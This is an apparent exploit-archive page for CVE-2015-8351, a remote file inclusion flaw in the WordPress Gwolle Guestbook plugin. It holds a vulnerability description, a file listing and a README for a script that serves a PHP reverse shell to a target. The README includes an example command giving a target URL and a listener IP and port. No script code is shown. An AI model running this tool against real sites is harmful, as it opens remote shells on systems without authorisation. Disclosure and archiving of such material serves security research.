CVE-2015-8351 PoC — WordPress Gwolle Guestbook插件安全漏洞

Source

https://github.com/G01d3nW01f/CVE-2015-8351

Associated Vulnerability

Title:WordPress Gwolle Guestbook插件安全漏洞 (CVE-2015-8351)
Description:WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。Gwolle Guestbook是其中的一个留言板插件。 WordPress Gwolle Guestbook插件1.5.3及之前版本中存在远程文件包含漏洞，该漏洞源于程序没有充分过滤用户提交的输入。远程攻击者可通过向frontend/captcha/ajaxresponse.php文件发送带有URL的‘abspath’参数利用该漏洞执行任意的PHP代码。

Description

this script is exploit for wordpress old plugin gwolle

Readme

# gwolle_buster
this script is exploit for wordpress old plugin gwolle

usage:

./gwolle_buster.py <target_url> <Lhost> <Lport>

first arguments <target_url> => your target url of wordpress that installed gwolle
second arguments <Lhost> => your ip
third arguments <Lport> => listening port for reverse shell 

example: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234

This Script will generate the php reverse shell script and bind the simple server,
so you need open the 2 new terminal and listen the netcat at first terminal, and request with curl commands,
however, commands are auto generate and appear at console,
therefore you can copy and paste easily

File Snapshot


 [4.0K]  /data/pocs/db45db92d0b0efdccbb308b7a34eb73bbe78c84c
├── [5.5K]  gwolle_buster.py
├── [ 670]  README.md
└── [2.1K]  reverse_shell.php

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!